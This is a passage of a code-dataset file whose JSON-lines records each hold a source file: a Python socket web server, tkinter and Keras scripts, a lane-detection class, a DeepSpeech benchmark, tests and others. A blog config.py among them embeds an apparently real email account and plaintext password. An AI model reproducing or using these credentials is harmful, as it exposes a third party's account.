%s(%s)

\" % (str(data['title'].encode('utf-8'), 'utf-8'), count))\n f.write(\"

%s

\" % str(data['summary'].encode('utf-8'), 'utf-8'))\n f.write(\"\")\n count += 1\n\n f.write(\"
%s%s%s
\")\n f.write(\"\")\n f.write(\"\")\n","sub_path":"py_pure/src/imooc/spider_baike_171212/html_outputer.py","file_name":"html_outputer.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562981319","text":"import socket\nimport _thread\n# TODO 了解thread(在python3中改名为_thread),threading 和 queue模块 和 multiprocessing模块(for CPU密集型任务) 和 logging 模块\n\nfrom utils import log\nfrom request import Request\n\nfrom routes import error\nfrom routes.routes_static import route_static\nfrom routes.routes_todo import route_dict as todo_routes\nfrom routes.routes_user import route_dict as user_routes\nfrom routes.routes_tweet import route_dict as tweet_routes\nfrom routes.routes_todo_ajax import route_dict as todo_ajax_routes\nfrom routes.routes_tweet_ajax import route_dict as tweet_ajax_routes\n\n\n# server.py的整理思路\n# 建立host和端口\n# 监听请求\n# 接受请求\n# 分解请求信息\n# method\n# path\n# query\n# body\n# 保存请求\n# 临时保存,用完就丢\n# 处理请求\n# 获取路由字典\n# path和响应函数的映射字典\n# 根据请求的path和字典处理请求并获得返回页面\n# routes\n# 主页\n# 返回页面\n# 登录\n# 处理post请求\n# 对比post数据和用户数据\n# 返回登录结果\n# 返回页面\n# 注册\n# 处理post请求\n# 对比post数据和注册规则\n# 保存合法的注册信息\n# 保存到User.txt\n# 返回注册结果\n# 返回页面\n# 留言板\n# 处理post请求\n# 将post的数据加入留言列表\n# 返回页面\n# 包含留言列表\n# 静态资源(图片)\n# 根据query的内容返回对应的资源\n# 返回响应内容\n# 发送响应内容\n# 关闭请求连接\n\n\ndef response_for_path(request, r):\n path = request.path\n response = r.get(path, error)\n return response(request)\n\n\n# 增加一个接收request的缓存函数\ndef request_cache(connection):\n buf = b''\n while True:\n cache = connection.recv(1024)\n buf += cache\n if len(cache) < 1024:\n break\n return buf.decode('utf-8')\n\n\ndef process_request(connection, r_d):\n r = request_cache(connection)\n # 因为 chrome 会发送空请求导致 split 得到空 list\n # 所以这里判断一下防止程序崩溃\n if len(r.split()) < 2:\n return\n # 设置 request 的 method\n request = Request(r)\n # chrome会发空请求,下面2行代码可以看出\n # log('r =====>', r)\n # log('r.split()=====>', r.split())\n # 用 response_for_path 函数来得到 path 对应的响应内容\n response = response_for_path(request, r_d)\n # 把响应发送给客户端\n connection.sendall(response)\n # 处理完请求, 关闭连接\n connection.close()\n\n\ndef run(host='', port=3000):\n \"\"\"\n 启动服务器\n \"\"\"\n # 初始化 socket 套路\n # 使用 with 可以保证程序中断的时候正确关闭 socket 释放占用的端口\n log('from run --> start at', '{}:{}'.format(host, port))\n print('from run --> start at', '{}:{}'.format(host, port))\n with socket.socket() as s:\n # 字典放在这里在多线程的时候就不会重复构造了\n r_d = {\n '/static': route_static,\n }\n r_d.update(user_routes)\n r_d.update(todo_routes)\n r_d.update(tweet_routes)\n r_d.update(todo_ajax_routes)\n r_d.update(tweet_ajax_routes)\n # 使用 下面这句 可以保证程序重启后使用原有端口, 原因忽略\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((host, port))\n s.listen(5)\n # 无限循环来处理请求\n while True:\n connection, address = s.accept()\n # 第二个参数类型必须是 tuple\n _thread.start_new_thread(process_request, (connection, r_d))\n\n\nif __name__ == '__main__':\n # 生成配置并且运行程序\n config = dict(\n host='',\n port=3000,\n )\n run(**config)\n","sub_path":"server_normal/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"404000883","text":"# -*- coding: utf-8 -*-\nimport qsoptex\nimport time\nfilename = 'afiro.mps'\np = qsoptex.ExactProblem()\np.read(filename, filetype='MPS')\np.write('lp_' + filename[0:-4] + '.lp', filetype=\"LP\")\nstring = ''\nfor line in open('lp_' + filename[0:-4] + '.lp'):\n string += line\nprint (string)\np.set_param(qsoptex.Parameter.SIMPLEX_DISPLAY, 1)\nstart=time.clock()\nstatus = p.solve()\nstop=time.clock()\nif status == qsoptex.SolutionStatus.OPTIMAL:\n print('Решилось за')\n print (stop-start)\n print('Вектор X:')\n print(map(float, p.get_values()))\n print('Экстремум:')\n print(float(p.get_objective_value()))\nelse:\n print(\"Не решилось\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"192436467","text":"import tkinter\r\nimport tkinter.messagebox\r\nimport random\r\nfrom asyncio import tasks\r\n\r\n# Create root window\r\nroot = tkinter.Tk()\r\n\r\n# Change root window background color\r\nroot.configure(bg=\"white\")\r\n\r\n# Change the title\r\nroot.title(\"My Super To Do List\")\r\n\r\n# Change the window size\r\nroot.geometry(\"325x275\")\r\n\r\n# Create an empty list\r\ntasks = []\r\n\r\n# For testing purposes use a defauly list\r\n# tasks = [\"Call mom\", \"Buy a game\", \"Eat fries\"]\r\n\r\n# Create functions\r\n\r\ndef update_listbox():\r\n # Clear the current list\r\n clear_listbox()\r\n # Populate the listbox\r\n for task in tasks:\r\n lb_tasks.insert(\"end\", task)\r\n\r\ndef clear_listbox():\r\n lb_tasks.delete(0, \"end\")\r\n\r\ndef add_task():\r\n # Get the task to add\r\n task = txt_input.get()\r\n # Make sure the task is not empty\r\n if task !=\"\":\r\n # Append to the list\r\n tasks.append(task)\r\n # Update the listbox\r\n update_listbox()\r\n else:\r\n tkinter.messagebox.showwarning(\"Warning you need to enter a task.\")\r\n txt_input.delete(0, \"end\")\r\n\r\ndef del_all():\r\n confirmed = tkinter.messagebox.askyesno(\"Please Comfirm\", \"Do you really want to delete all?\")\r\n if confirmed == True:\r\n # Since we are changing the list, it needs to be global\r\n global tasks\r\n # Clear the tasks list\r\n tasks = []\r\n # update the listbox\r\n update_listbox()\r\n\r\ndef del_one():\r\n # Get the text of the currently selected item\r\n task = lb_tasks.get(\"active\")\r\n # Confirm it is in the list \r\n if task in tasks:\r\n tasks.remove(task)\r\n # Update the listbox\r\n update_listbox()\r\n\r\ndef sort_asc():\r\n # Sort the list \r\n tasks.sort()\r\n # Update the listbox\r\n update_listbox()\r\n\r\ndef sort_decs():\r\n # Sort the list \r\n tasks.sort()\r\n # reverse the list\r\n tasks.reverse()\r\n # Update the listbox\r\n update_listbox()\r\n\r\ndef choose_random():\r\n # Choose a random task\r\n task = random.choice(tasks)\r\n # Update the display label\r\n lbl_display[\"text\"]=task\r\n\r\ndef show_number_of_tasks():\r\n # Get the number of tasks\r\n number_of_tasks = len(tasks)\r\n # Create and format the message\r\n msg = \"Number if tasks: %s\" %number_of_tasks\r\n # Display the message\r\n lbl_display[\"text\"]= msg\r\n\r\n\r\n\r\n\r\n\r\n\r\nlbl_title = tkinter.Label(root, text=\"To-Do-List\", bg=\"white\")\r\nlbl_title.grid(row=0,column=0)\r\n\r\nlbl_display = tkinter.Label(root, text=\"\", bg=\"white\")\r\nlbl_display.grid(row=0,column=1)\r\n\r\ntxt_input = tkinter.Entry(root, width=15)\r\ntxt_input.grid(row=1,column=1)\r\n\r\nbtn_add_task = tkinter.Button(root, text=\"Add task\", fg=\"black\", bg=\"white\", command=add_task)\r\nbtn_add_task.grid(row=1,column=0)\r\n\r\nbtn_del_all = tkinter.Button(root, text=\"Delete All\", fg=\"black\", bg=\"white\", command=del_all)\r\nbtn_del_all.grid(row=2,column=0)\r\n\r\nbtn_del_one = tkinter.Button(root, text=\"Delete\", fg=\"black\", bg=\"white\", command=del_one)\r\nbtn_del_one.grid(row=3,column=0)\r\n\r\nbtn_sort_asc = tkinter.Button(root, text=\"Sort (ASC)\", fg=\"black\", bg=\"white\", command=sort_asc)\r\nbtn_sort_asc.grid(row=4,column=0)\r\n\r\nbtn_sort_decs = tkinter.Button(root, text=\"Sort (DECS)\", fg=\"black\", bg=\"white\", command=sort_decs)\r\nbtn_sort_decs.grid(row=5,column=0)\r\n\r\nbtn_choose_random = tkinter.Button(root, text=\"Choose Random\", fg=\"black\", bg=\"white\", command=choose_random)\r\nbtn_choose_random.grid(row=6,column=0)\r\n\r\nbtn_number_of_task = tkinter.Button(root, text=\"Number of Tasks\", fg=\"black\", bg=\"white\", command=show_number_of_tasks)\r\nbtn_number_of_task.grid(row=7,column=0)\r\n\r\nbtn_exit = tkinter.Button(root, text=\"Exit\", fg=\"black\", bg=\"white\", command=exit)\r\nbtn_exit.grid(row=8,column=0)\r\n\r\nlb_tasks = tkinter.Listbox(root)\r\nlb_tasks.grid(row=2,column=1,rowspan=7)\r\n\r\n# Start the main events loop\r\nroot.mainloop()","sub_path":"GUI_ToDoList.py","file_name":"GUI_ToDoList.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"379275910","text":"\"\"\"\n주어진 N 길이의 숫자열을 오름차순으로 정렬하여 출력하라.\n\n[제약 사항]\n\nN 은 5 이상 50 이하이다.\n\n\n[입력]\n\n가장 첫 줄에는 테스트 케이스의 개수 T가 주어지고, 그 아래로 각 테스트 케이스가 주어진다.\n\n각 테스트 케이스의 첫 번째 줄에 N 이 주어지고, 다음 줄에 N 개의 숫자가 주어진다.\n\n\n[출력]\n\n출력의 각 줄은 '#t'로 시작하고, 공백을 한 칸 둔 다음 정답을 출력한다.\n\n(t는 테스트 케이스의 번호를 의미하며 1부터 시작한다.)\n\n입력\n10\n5\n1 4 7 8 0\n...\n출력\n#1 0 1 4 7 8\n...\n\"\"\"\nimport sys\nsys.stdin = open('input.txt')\nt = int(input())\n\nfor i in range(t):\n a = int(input())\n arr = list(map(int,input().split()))\n arr.sort()\n\n print('#%d'%(i+1),end=' ')\n for j in range(len(arr)):\n print(arr[j],end=' ')\n print('')","sub_path":"python daily coding/2020.5.09 (SW Expert Academy)/1966번 (숫자를 정렬하자).py","file_name":"1966번 (숫자를 정렬하자).py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"456281381","text":"#coding:utf-8\n\n##############################\n# 还需要的功能,\n# 根据用户配置的模块以及模式,自动设置,不需要更改views代码\n# 添加用户评论功能,评论之后邮件通知\n# 添加定时刷新功能\n# 添加后台功能\n# 添加后台添加文章功能\n# 添加数据保存到云盘\n# 添加后台进行用户配置功能\n\n###########系统设置#############\n# 默认缓存数量\nCACHE_SIZE = 10\n# 刷新时间,单位分钟,小于0等于0代表不使用缓存,同时CACHE_SIZE无效,默认10分钟,可以比10大,比10小默认为10\nREFRESH_TIME = 20\n\n###########博客设置#############\n# 博客根目录\nROOT_DIR = \"/home/ever/Documents/blog/\"\n# 每页默认显示条目数量\nDEFAULT_ENTRY_NUM = 6\n# 默认排序方法\nSORT_BY = 'time'\n# 默认降序\nDEFAULT_DES = True\n# 忽略前缀,包括文件和文件名\nIGNORE_PREFIX = ['.', '_', '*', '~']\n# 忽略文件夹名称\nIGNORE_DIR = ['img', 'file', 'code', 'media', 'test', 'tmp', 'src']\n# 忽略的文件名称\nIGNORE_FILE = ['临时', 'tmp']\n# 允许读取的文件后缀\nFILE_TYPE = ['.md', '.markdown', '.html']\n\n###########网页设置############\n# 模板主题\nTHEME = 'blackAndWhite'\n# 主题顶栏设置\n# 包括大标题,小标题,显示的模块名称,模块后面应该跟着链接,同时应该有模块的模式,比如三列,两列,一列等等模式\nTOP_BAR = {\n \"title\": \"城南旧事\",\n \"list\": [\n {\"首页\": \"\"},\n {\"笔记\": \"biji\"},\n {\"随笔\": \"suibi\"},\n {\"设计\": \"sheji\"},\n {\"摄影\": \"sheying\"},\n {\"作品\": \"project\"},\n {\"联系\": \"contact\"}\n ]\n}\n# 缩略显示文件的前几行\nSHOW_LINES = 15\n\n# 需不需要过滤缩展示页的图片,一般ARTICLE_DEFAULT的top_icon为空的时候设置\n# 意思是如果文章前几行有图片的话,那么就会显示\n# 一般不显示,而是在模板中使用icon\nSHOW_ARTICLE_IMG_IN_THUMBNAIL = False\n\n###########个人信息设置############\nAUTHOR_INFO = {\n \"name\": \"redusty\",\n \"icon\": [\"\"],\n \"des\": [\"\"],\n \"qrcode\": [\"\"],\n \"address\": [\"\"],\n \"phone\": [\"\"],\n \"email\":[\"\"],\n \"qq\": [\"\"],\n \"hobby\":[\"\"],\n \"moto\": \"The quiter you become, the more you are able to hear.\",\n \"introduceYourself\": \"\",\n}\n\n###########默认文章信息设置############\nARTICLE_DEFAULT = {\n \"source\": \"原创\",\n # 默认缩略图图标\n \"icon\": \"/static/img/logo2.jpg\",\n # 文章顶部图片\n \"top_icon\": \"\",\n}\n\n###########默认游客信息#############\nGUEST_INFO = {\n \"name\" : \"guest\",\n \"avatar\" : \"\",\n \"des\" : \"\"\n}\n\n###########邮件配置###########\nEMAIL = {\n # 邮件服务器\n \"host\": \"smtp.163.com\",\n # 邮件服务器端口\n \"port\": 25,\n # 邮箱名称\n \"user\": \"binary@163.com\",\n # 邮箱密码\n \"password\": \"tian163\",\n # 接收邮件的人\n \"emailto\": [\"redusty@163.com\",]\n}\n","sub_path":"src/MarkDownBlog/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"581769862","text":"class Line:\n def __init__(self, lim, corners):\n # was the line detected in the last iteration?\n self.detected = False\n self.beldetected = False\n # x values of the last n fits of the line\n self.fitx = None\n # y values of the last n fits of the line\n self.fity = None\n #polynomial coefficients averaged over the last n iterations\n self.updated_fit = None\n # best fit\n self.best_fit = None\n # x values detected\n self.allx = None\n #y values for detected line pixels\n self.ally = None\n # top x of corners\n self.btopxy = corners[0]\n # bottom x of corners\n self.bbotxy = corners[1]\n # top x of updated\n self.utopxy = None\n # bottom x of update\n self.ubotxy = None\n # lower and upper of corners\n self.pointlim = lim\n # x values of the bird's eye line\n self.belx = None\n # y values of the bird's eye line\n self.bely = None\n #polynomial coefficients over ebl\n self.bel_fit = None\n #curvature\n self.curverad = None\n\n def setLine(self, x, y):\n if x and y:\n self.allx = np.asarray(x)\n self.ally = np.asarray(y)\n self.detected = True\n else:\n self.detected = False\n\n def updateLineFit(self, LU, thres):\n '''\n This function updates the curve fit given thres.\n If the line fit is not detected then set the line fit\n based on allx, ally\n If the line fit exists, first compare allx and fitx and\n if the diff is less than thres, replace or\n add the corresponding allx and ally to fitx and fity\n Input: self.allx, self.ally, thres\n Output: self.updated_fit\n '''\n if self.updated_fit is None:\n self.fitx = self.allx\n self.fity = self.ally\n else:\n x_ = np.polyval(self.updated_fit, self.ally)\n x_.astype(int)\n #print(np.abs(x_ - self.allx))\n truefalse = np.abs(x_ - self.allx) < thres\n x__ = self.allx[truefalse]\n y__ = self.ally[truefalse]\n for i, val in enumerate(y__):\n indx = np.argwhere(self.fity == val)\n if indx.any():\n #print(self.fitx[indx])\n self.fitx[indx] = x__[i]\n else:\n self.fitx = np.append(self.fitx, x__[i])\n self.fity = np.append(self.fity, val)\n self.updated_fit = np.polyfit(self.fity, self.fitx, 2)\n\n def updateBestFitwithUpdated(self):\n self.best_fit = self.updated_fit\n\n def updateBestPointswithUpdated(self):\n self.btopxy = self.utopxy\n self.bbotxy = self.ubotxy\n\n def getBestLine(self, LU):\n x_ = None\n y_ = None\n if self.updated_fit is not None:\n y_ = np.sort(self.fity)\n x_ = np.polyval(self.updated_fit, y_)\n elif self.best_fit is not None:\n y_ = range(LU[0], LU[1])\n x_ = np.polyval(self.best_fit, y_)\n return x_, y_\n\n def setBestPoints(self, topxy, botxy):\n self.btopxy = topxy\n self.bbotxy = botxy\n\n def getUpdatedPoints(self, y):\n l0 = self.pointlim[0] * y\n l1= self.pointlim[1] * y\n self.utopxy = [int(np.polyval(self.updated_fit, l0)), int(l0)]\n self.ubotxy = [int(np.polyval(self.updated_fit, l1)), int(l1)]\n return self.utopxy, self.ubotxy\n\n def getBestPoints(self, y):\n return self.btopxy, self.bbotxy\n\n def isDetected(self):\n return self.detected\n\n def isBelDetected(self):\n return self.beldetected\n\n def setBEL(self, x, y):\n if x and y:\n self.belx = np.asarray(x)\n self.bely = np.asarray(y)\n self.beldetected = True\n else:\n self.beldetected = False\n\n def updateBELFit(self, LU, thres):\n #alpha: weight for bestx, the greater, the less the update\n if self.bel_fit is not None:\n x_ = np.polyval(self.bel_fit, self.bely)\n x_.astype(int)\n truefalse = np.abs(x_ - self.belx) < thres\n x__ = self.belx[truefalse]\n y__ = self.bely[truefalse]\n for i, val in enumerate(y__):\n indx = np.argwhere(self.bely == val)\n if indx.any():\n #print(self.fitx[indx])\n self.belx[indx] = x__[i]\n else:\n self.belx = np.append(self.belx, x__[i])\n self.bely = np.append(self.bely, val)\n self.bel_fit = np.polyfit(self.bely, self.belx, 2)\n\n def getBELFitx(self, y):\n belfitx = np.polyval(self.bel_fit, y)\n belfitx = np.asarray(belfitx, dtype=int)\n return belfitx\n\n def getCurveRad(self):\n y_eval = np.max(self.bely)\n self.curverad = ((1 + (2*self.bel_fit[0]*y_eval + self.bel_fit[1])**2)**1.5)/np.absolute(2*self.bel_fit[0])\n return self.curverad\n \n def getCurveRadinMeter(self, imgheight, lanewidth):\n # Define conversions in x and y from pixels space to meters\n ym_per_pix = 30/imgheight # meters per pixel in y dimension\n xm_per_pix = 3.7/lanewidth # meteres per pixel in x dimension\n\n y_eval = 30\n fit_cr = np.polyfit(self.bely*ym_per_pix, self.belx*xm_per_pix, 2)\n curverad = ((1 + (2*fit_cr[0]*y_eval + fit_cr[1])**2)**1.5)/np.absolute(2*fit_cr[0])\n return int(curverad)\n","sub_path":"Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316257621","text":"# Course: IT102 Section C\n# Authors: Victor Woo\n# Date: 24/10/2016\n# Assignment: PP10\n\nimport random\n\ndef getINPUTS(wordList, counter):\n while(True):\n\n if(counter+1 == 1):\n counterWORD = \"1st\"\n elif(counter+1 == 2):\n counterWORD = \"2nd\"\n elif(counter+1 == 3):\n counterWORD = \"3rd\"\n else:\n counterWORD = str(counter+1) + \"nd\"\n\n if(counter == 5):\n break;\n\n wordINPUT = input(\"Please enter 5 words. This is your \" + counterWORD + \" word \");\n if(wordINPUT.isalpha() == True):\n word.append(wordINPUT)\n counter+=1\n else:\n print(\"Please enter a real word\");\n\ndef mixMeUp(mixWORD):\n return ''.join(random.sample(mixWORD,len(mixWORD)));\n\ndef GuessME(beforeList, afterList):\n guessINPUT = input(\"Guess what the anagram word is \" + afterList + \" \");\n\n if(beforeList == guessINPUT):\n print(\"Correct\")\n return True\n else:\n print(\"Incorrect\")\n return False\n\nword = [];\nwordBEFORE = []\ncounter = 0;\nGMList = [];\nGMCounter = 0;\n\ngetINPUTS(word, counter);\nwordBEFORE = list(word);\nfor i in range(4):\n word[i] = mixMeUp(word[i])\n\nwhile GMCounter < 5:\n randomINT = random.randint(0, 4)\n if (randomINT not in GMList):\n if(GuessME(wordBEFORE[randomINT], word[randomINT]) == True):\n GMList.append(randomINT);\n GMCounter+=1;\n\nprint(\"Nice work buddy. Thanks for playing\");\n","sub_path":"python-learn/PP10.py","file_name":"PP10.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113145317","text":"from telegram import Chat\n\nfrom functionalities.unhandled import UnhandledMessageFunctionality\nfrom tests.util.mock_telegram_update import MockTelegramUpdate\n\n\ndef test_unhandled_message(context):\n update = MockTelegramUpdate.with_message(\n text=\"Hello can I have a picture\"\n )\n unhandled = UnhandledMessageFunctionality()\n\n unhandled.call(update, context)\n\n context.bot.send_message.assert_called_with(\n chat_id=update.message.chat_id,\n text=\"Sorry, I'm not sure how to handle that message\"\n )\n\n\ndef test_unhandled_group_message(context):\n update = MockTelegramUpdate.with_message(\n text=\"Hey friendo, how are you?\",\n chat_type=Chat.GROUP\n )\n unhandled = UnhandledMessageFunctionality()\n\n unhandled.call(update, context)\n\n context.bot.send_message.assert_not_called()\n","sub_path":"tests/functionality/test_unhandled_message.py","file_name":"test_unhandled_message.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163471225","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nfrom tensorflow.python.keras import layers\nimport os\nimport numpy as np\nos.chdir('/home/zzy/PycharmProjects/tf/')\n\ndata = input_data.read_data_sets('data/MNIST/',one_hot=True)\n\nprint(data.train.labels[0])\ninput = layers.Input(shape=(28,28,1))\n\nlayer_a = layers.Conv2D(16,(5,5),activation='relu')(input)\nlayer_a1 = layers.MaxPool2D((2,2),2)(layer_a)\nlayer_a2 = layers.Dropout(0.25)(layer_a1)\n\nlayer_b = layers.Conv2D(36,(5,5),activation='relu')(layer_a2)\nlayer_b1 = layers.MaxPool2D((2,2),2)(layer_b)\nlayer_b2 = layers.Dropout(0.25)(layer_b1)\nlayer_b3 = layers.Flatten()(layer_b2)\nlayer_c = layers.Dense(128,activation='relu')(layer_b3)\nlayer_c1 = layers.Dropout(0.25)(layer_c)\n\noutput = layers.Dense(10,activation='softmax')(layer_c1)\n\nmodel = tf.keras.Model(input,output)\n\nmodel.compile(loss='categorical_crossentropy',optimizer=tf.keras.optimizers.SGD(lr=0.01,decay=1e-6,momentum=0.9,nesterov=True),metrics = ['accuracy'])\n\ntrain_images = np.reshape(data.train.images,(-1,28,28,1))\nvar_images = np.reshape(data.validation.images,(-1,28,28,1))\nmodel.fit(train_images,data.train.labels, epochs=500, batch_size=64, validation_data=(var_images, data.validation.labels))\n\n\n","sub_path":"train/tf_mnist.py","file_name":"tf_mnist.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"108910400","text":"# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport time\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\n\n# from nets import inception\nimport deep_speech_model\nfrom tensorflow.python.framework import graph_util\n\nslim = tf.contrib.slim\n\nflags = tf.flags\nflags.DEFINE_integer(\"batch_size\", 1, \"mini batch size\")\nflags.DEFINE_integer(\"hidden_size\", 256, \"hidden size\")\nflags.DEFINE_boolean('profile', False, 'profile kernel runtime')\nflags.DEFINE_integer(\"num_iter\", 10, \"mini batch size\")\nflags.DEFINE_integer(\"warmup\", 5, \"mini batch size\")\nflags.DEFINE_boolean('xla', False, 'enable xla')\nflags.DEFINE_string('frozen_file', '', 'output path for the frozen pb file')\nflags.DEFINE_integer(\"parallel\", 0, \"tf.ConfigProto.inter_op_parallelism_threads\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n session_conf = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False,\n graph_options=tf.GraphOptions(infer_shapes=True),\n inter_op_parallelism_threads=FLAGS.parallel\n )\n if FLAGS.xla:\n session_conf.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1\n with tf.Graph().as_default(), tf.Session(config=session_conf) as session:\n batch_size = FLAGS.batch_size\n\n num_classes = 29\n height = 300 # voice length\n hidden_size = FLAGS.hidden_size\n\n eval_inputs = tf.placeholder(\n tf.float32, [batch_size, height, 171, 1], 'eval_input')\n\n model = deep_speech_model.DeepSpeech2(num_rnn_layers=7, rnn_type='lstm', is_bidirectional=False,\n rnn_hidden_size=hidden_size, num_classes=num_classes, use_bias=True)\n\n logits = model(eval_inputs, False)\n\n image_inputs = np.ones((batch_size, height, 171, 1))\n\n session.run(tf.global_variables_initializer())\n\n if FLAGS.frozen_file != '':\n constant_graph = graph_util.convert_variables_to_constants(session, session.graph_def, [logits.name.split(':')[0]])\n with tf.gfile.GFile(FLAGS.frozen_file, \"wb\") as f:\n f.write(constant_graph.SerializeToString())\n\n if not FLAGS.profile:\n # warm up\n for i in range(FLAGS.warmup):\n output = session.run(logits, {eval_inputs: image_inputs})\n out_flat = output.flat\n if (len(out_flat) > 0):\n max_len = min(10, len(out_flat))\n print(logits.name)\n print(out_flat[:max_len], \"...(size=\", len(out_flat), \"end with\", out_flat[-1], \")\")\n\n iter_times = []\n\n for i in range(FLAGS.num_iter):\n start_time = time.time()\n output = session.run(logits, {eval_inputs: image_inputs})\n iter_time = (time.time() - start_time) * 1000\n iter_times.append(iter_time)\n print(\"Iteration time %f ms\" % (iter_time))\n\n print(\"Summary: [min, max, mean] = [%f, %f, %f] ms\" % (\n min(iter_times), max(iter_times), sum(iter_times) / len(iter_times)))\n\n else:\n options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n for i in range(5):\n start_time = time.time()\n output = session.run(logits, {eval_inputs: image_inputs},\n options=options,\n run_metadata=run_metadata)\n end_time = (time.time() - start_time) * 1000\n print(\"iteration time %f ms\" % (end_time))\n fetched_timeline = timeline.Timeline(run_metadata.step_stats)\n chrome_trace = fetched_timeline.generate_chrome_trace_format()\n with open('timelines/timeline_step_%d.json' % i, 'w') as f:\n f.write(chrome_trace)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"artifacts/models/deepspeech2/deep_speech_inference.py","file_name":"deep_speech_inference.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420428252","text":"from __future__ import absolute_import\nfrom builtins import str\nfrom builtins import range\nfrom .base import BaseSolutionsTest\nfrom common.heat.base import BaseHeatTest\nfrom tcutils.wrappers import preposttest_wrapper\nimport test\nfrom ipam_test import *\nfrom vn_test import *\nfrom quantum_test import *\nfrom floating_ip import FloatingIPFixture\nfrom vm_test import *\nfrom tcutils.test_lib.test_utils import assertEqual\nfrom vnc_api import vnc_api\nfrom vnc_api.gen.resource_test import *\nfrom heat_test import HeatStackFixture\nfrom nova_test import *\nimport os\nimport yaml\nimport time\nimport glob\n\naf_test = 'dual'\n\nclass OrangeSolutionTest(BaseSolutionsTest):\n _interface = 'json'\n\n @classmethod\n def setUpClass(cls):\n super(OrangeSolutionTest, cls).setUpClass()\n #Can update deployment path based on variable.\n cls.deploy_path=os.getenv('DEPLOYMENT_PATH',\n 'serial_scripts/solution/topology/mini_deployment/')\n cls.fip=bool(os.getenv(\"USE_FIP\", 'False').lower() in ['true', '1'])\n cls.setup_vepg()\n\n @classmethod\n def tearDownClass(cls):\n cls.delete_vepg()\n super(OrangeSolutionTest, cls).tearDownClass()\n\n @classmethod\n def setup_vepg(cls):\n\n if \"orange\" in cls.deploy_path:\n ## TBD - NEED TO DERIVE VALUES BASED ON INPUTS\n cls.NB_VSFO_CP_NODES=2\n cls.NB_VSFO_UP_NODES=2\n #vSFO CP sizing\n cls.NB_VSFO_CP_EXT_NIC=1\n cls.NB_VSFO_CP_SIGIF=3\n cls.NB_APN_RADIUS=5\n # vSFO UP sizing\n cls.NB_VSFO_UP_EXT_NIC=4\n cls.NB_VSFO_UP_CNNIC=2\n cls.NB_VSFO_UP_CNIF=2\n cls.NB_APN=100\n cls.NB_BGP_PREFIXES_PER_APN=384\n else:\n ## TBD - NEED TO DERIVE VALUES BASED ON INPUTS\n cls.NB_VSFO_CP_NODES=1\n cls.NB_VSFO_UP_NODES=1\n #vSFO CP sizing\n cls.NB_VSFO_CP_EXT_NIC=1\n cls.NB_VSFO_CP_SIGIF=3\n cls.NB_APN_RADIUS=5\n # vSFO UP sizing\n cls.NB_VSFO_UP_EXT_NIC=2\n cls.NB_VSFO_UP_CNNIC=1\n cls.NB_VSFO_UP_CNIF=2\n cls.NB_APN=5\n cls.NB_BGP_PREFIXES_PER_APN=10\n\n #Quota Create.\n cls.quota_env_file=cls.deploy_path+\"env/quota.yaml\"\n with open(cls.quota_env_file, 'r') as fd:\n cls.quota_env = yaml.load(fd, Loader=yaml.FullLoader)\n\n cls.quota_template_file=cls.deploy_path+\"template/quota.yaml\"\n with open(cls.quota_template_file, 'r') as fd:\n cls.quota_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n #Update env with project name.\n cls.quota_env['parameters']['project'] = cls.connections.project_name\n cls.quota_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_quota',\n template=cls.quota_template, env=cls.quota_env)\n cls.quota_stack.setUp()\n\n #Image Upload.\n cls.vrp_image = cls.nova_h.get_image('VRP-IMAGE')\n cls.vsfo_cp_image = cls.nova_h.get_image('VSFO-CP-IMAGE')\n cls.vsfo_up_image = cls.nova_h.get_image('VSFO-UP-IMAGE')\n\n #Flavor Create.\n cls.flavors_template_file=cls.deploy_path+\"template/flavors.yaml\"\n with open(cls.flavors_template_file, 'r') as fd:\n cls.flavors_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n cls.flavors_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_flavors',\n template=cls.flavors_template)\n cls.flavors_stack.setUp()\n\n #AZ Create.\n cls.agg_id = {}\n if not cls.inputs.dpdk_ips:\n cls.agg_id['kernel-computes'] = cls.connections.orch.create_agg(\n 'kernel-computes',\n 'kernel-computes')\n host_list = cls.connections.orch.get_hosts()\n cls.nova_hosts = copy.deepcopy(host_list)\n cls.connections.orch.add_host_to_agg(cls.agg_id['kernel-computes'],\n 